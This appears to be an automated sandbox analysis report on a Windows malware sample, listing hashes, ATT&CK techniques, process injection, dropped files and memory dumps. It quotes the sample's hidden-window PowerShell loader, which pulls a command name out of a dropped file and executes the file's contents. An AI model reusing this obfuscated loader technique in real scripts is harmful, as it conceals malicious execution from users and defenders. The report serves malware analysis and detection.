987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be

General

Target

987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exe
Size

456KB
MD5

6d84fe81c98c02205cc129f68aca4529
SHA1

cf805bfa98d12c72a2f355cf1743de9ca7b8d12c
SHA256

987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be
SHA512

cae0bb8a0297d54f5f9db2c7361f5fba9e8032e2bad91573ff9d83af3d87c86a483aff4afb0621cfc9dd744612bcdadf3ae315ed031c77adc342d0b447310009
SSDEEP

6144:9qjI9UE2ypwdlL93DrhArk3l2fd55p5uhI5o8NUN6SYUiIdCcFSaKImLxUIohqy:UM2yKjL1mrnJpu0c6SDUH9UIohqy

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1776 powershell.exe
Loads dropped DLL 1 IoCs

Processes:

987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exe

pid process

3764 987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3764	987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exe

pid	process
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1776 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1776	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exepowershell.exe

description	pid	process	target process
PID 3764 wrote to memory of 1776	3764	987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exe	powershell.exe
PID 3764 wrote to memory of 1776	3764	987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exe	powershell.exe
PID 3764 wrote to memory of 1776	3764	987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exe	powershell.exe
PID 1776 wrote to memory of 4664	1776	powershell.exe	cmd.exe
PID 1776 wrote to memory of 4664	1776	powershell.exe	cmd.exe
PID 1776 wrote to memory of 4664	1776	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exe
"C:\Users\Admin\AppData\Local\Temp\987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\Admin\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
3⤵
PID:4664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnekzaem.hwv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss34AD.tmp\nsExec.dll

Filesize
6KB

MD5
ac0f93b2dec82e9579bff14c8572a6c8

SHA1
6460244317cbb77e342adb3561ec3acb496c84d5

SHA256
3aa8e0abadefea2de58281198acfe48713a1d5b43aea5619f563cea098e9fd34

SHA512
8055a6af150c45547927499f9cbf645d7f39c8e4f9caff4726fd711d2401abca01a79837095e5752b9f57b06446973ea6506796f2223bdb0179243d6e0575bd2

Download Submit
C:\Users\Admin\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej

Filesize
52KB

MD5
ab2bd584c3d4e1f6b687200045f39300

SHA1
7f9b567db12d512961c686396ed2850064d72030

SHA256
b0bd6eb0ce913e5e351d974afec11340e29711fd70287b629d16685d71beeb13

SHA512
f49f8fdc4abd9d05734085de9e5114247ee80ec088ea3d38dd4feb9ad2989f9e9c863f887c7f6e80a66a29f87baec6d60543b06142558353bd2a717cf2deda42

Download Submit
memory/1776-37-0x00000000056D0000-0x0000000005A24000-memory.dmp

Filesize
3.3MB

Download
memory/1776-39-0x0000000005BC0000-0x0000000005C0C000-memory.dmp

Filesize
304KB

Download
memory/1776-24-0x0000000073D90000-0x0000000074540000-memory.dmp

Filesize
7.7MB

Download
memory/1776-25-0x0000000005450000-0x0000000005472000-memory.dmp

Filesize
136KB

Download
memory/1776-23-0x0000000004DF0000-0x0000000005418000-memory.dmp

Filesize
6.2MB

Download
memory/1776-32-0x0000000005560000-0x00000000055C6000-memory.dmp

Filesize
408KB

Download
memory/1776-26-0x00000000054F0000-0x0000000005556000-memory.dmp

Filesize
408KB

Download
memory/1776-21-0x0000000002600000-0x0000000002636000-memory.dmp

Filesize
216KB

Download
memory/1776-38-0x0000000005B90000-0x0000000005BAE000-memory.dmp

Filesize
120KB

Download
memory/1776-22-0x0000000073D90000-0x0000000074540000-memory.dmp

Filesize
7.7MB

Download
memory/1776-42-0x0000000006B40000-0x0000000006B62000-memory.dmp

Filesize
136KB

Download
memory/1776-41-0x00000000060A0000-0x00000000060BA000-memory.dmp

Filesize
104KB

Download
memory/1776-40-0x00000000060F0000-0x0000000006186000-memory.dmp

Filesize
600KB

Download
memory/1776-43-0x00000000071E0000-0x0000000007784000-memory.dmp

Filesize
5.6MB

Download
memory/1776-20-0x0000000073D9E000-0x0000000073D9F000-memory.dmp

Filesize
4KB

Download
memory/1776-45-0x0000000007E10000-0x000000000848A000-memory.dmp

Filesize
6.5MB

Download
memory/1776-47-0x0000000073D9E000-0x0000000073D9F000-memory.dmp

Filesize
4KB

Download
memory/1776-48-0x0000000073D90000-0x0000000074540000-memory.dmp

Filesize
7.7MB

Download
memory/1776-49-0x0000000073D90000-0x0000000074540000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing